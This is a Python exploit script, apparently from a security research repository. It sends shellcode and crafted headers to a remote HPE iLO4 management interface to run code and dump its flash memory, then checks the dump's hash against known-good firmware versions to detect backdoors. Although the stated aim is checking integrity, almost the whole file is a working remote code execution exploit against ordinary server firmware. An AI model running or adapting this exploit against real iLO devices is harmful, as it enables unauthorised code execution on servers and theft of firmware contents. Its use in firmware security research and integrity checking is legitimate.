-
Notifications
You must be signed in to change notification settings - Fork 78
/
exploit_check_flash.py
107 lines (86 loc) · 3.83 KB
/
exploit_check_flash.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#!/usr/bin/python
# [WORKING] Read Flash
import sys
from exploit_helpers import *
from hexdump import hexdump
from hashlib import sha256
DEBUG=False
KNOWN_GOODS = {
"dced8587ff3c9ffb98303e8c92dfb2a365b2d5e728e9c46e043be7768895a4e4": "101",
"27e504220ab8f4470510be1ecb94434e96655bfe15249f254b7ea8536dd7cff3": "105",
"046a2db28b77d7d6805c17200787623c5e8affd89528542587a0735f8117021a": "110",
"b355100c2287fbc1cfb1753f20a20607b17e0d3c9eeffe561b769b0daa8385a2": "113",
"d3d5e6d192abee517906b38108f00b8c1fc4f4325e02fbe9e33aedf5bb61170e": "120",
"5344238e154e252849313daa7cee460616449f927dae98c67340fd7f0397fcbd": "122",
"92d4d11860564d4e234bc5c1c5dcf92e94437982c1685cc9bbe195d487ef6dc9": "130",
"1c60d5e71d628974b658a2d5a054c217a50bb565e102ae6f949294a321cc964a": "132",
"0ff2dca21a7c401d685027d101b8fcdd163e58859aa75c85d493af882176568f": "140",
"4178bd0afbb2eaeb0b8653cf8def9d9d6c8c99234fbd33fd3827f0317df1f2f0": "150",
"1732746db73cb9d7e15ea03b91c2c113c036eec1a1e36b7016947d9e3967533d": "151",
"1a32c32aa80540bd86a30a0729b2dff229a0534fe0d8b42623546eb153525243": "153",
"67584903b0385170fb83ed99512c04c19dde9fc8024e3711b588814acf698ff1": "200",
"1b794e8f39c5a7afb2c80856be3163344aeafaebdbac2a666c2fcfaabed71869": "202",
"e7593b532427deec3ba17e1ab50880d37c1a8952ac086423c3ef57d2b7ad3b68": "203",
"f1b6a3e9cd890e661089b1076a2dda1ad1bdc325a044ba3f1db597a1a24f1bf8": "210",
"e5994393d94fa1746568c221f2401c2116695af2b9095aa78d65ef3c338f7fc9": "211",
"64c0839458382647a8ce137b0a11cec56acdd5eb8d54f186932f9c4855d467a7": "222",
"fd5bace5b109a3e2d4b3a99fad5dc1f782d28f477909240ed4efb7487acc4d20": "230",
"863e3cad91f18d60f1bb1fa1581d4ef4112c11246b91852d71cbd3cddca920fd": "231",
"75f197a2ac21ecb15a641b32bfb6f7163ca564fcc02502dbf78ffa79a3797151": "240",
"f687cf681ca22e8ced2e3e9200f62ec274fe52741233578391d17f6b38be52de": "242",
"6dbb3d523a2c0b2832e5000ad5633111bbba6d56241941ccbcb62afa40ebee9b": "244",
"3f8f38e7cc5108a35349b8b0188e16c74a40987147c5b47babf0b7dc0efc17f5": "250",
"5c323326cdbcebb35ccc35c717542b19daa0648dbf2323b7a4c9f03879d1d803": "254",
"017c1bcda5cc135e4b29ceb69c68595ca5670c35edcfd0c8043e1a9fea56ee98": "255",
"9d80a4e81203351cda7942e603d869e1a1ac653aa32e46eb8a2141465fc49462": "260"
}
if len(sys.argv) < 4:
print "[-] usage: %s remote_addr remote_port version" % sys.argv[0]
sys.exit(1)
version = sys.argv[3]
o = get_version_info(version)
addr_start = 0
mem_count = 0x1000000
chip = 0
s = ssl_connector(sys.argv[1], int(sys.argv[2]))
print "[*] Assembling shellcode..."
with open("flash_read.S","rb") as fff:
shellcode = fff.read() % (
o["wbuff_addr"]+0x4000,
o["SSL_Write"],
addr_start,
mem_count,
chip,
o["VComClientSync_Call"]
)
bin_sc = asm_sc(shellcode)
check_shellcode(bin_sc)
sc_headers = get_sc_headers(bin_sc)
sc_headers += get_flush_headers()
vtable_headers = get_vtable_headers(o)
cookies_headers = get_cookies_headers()
ilo_version = get_xml_version(s, sc_headers + cookies_headers + vtable_headers)
if version != ilo_version.replace(".",""):
print "[-] Bad version specified in command line"
ths = fill_threads(sys.argv[1], sc_headers + cookies_headers + vtable_headers)
send_exploit(s, sc_headers + cookies_headers + vtable_headers, o)
stop_threads(ths)
btmp = ""
out = ""
while not btmp.startswith("EOT"):
btmp = s.recv(0x818)
if len(btmp) == 0:
continue
if "EOT" in btmp and len(btmp) < 8:
break
else:
#hexdump(btmp)
print "[*] 0x%08x bytes..." % len(out)
out += btmp[5:0x405]
if DEBUG:
open("out.bin", "wb").write(out)
flash_hash = sha256(out).hexdigest()
if flash_hash in KNOWN_GOODS:
print "[+] Flash contains iLO4 version %s" % KNOWN_GOODS[flash_hash]
else:
print "[-] Unknown firmware dumped! This might indicate a backdoor!"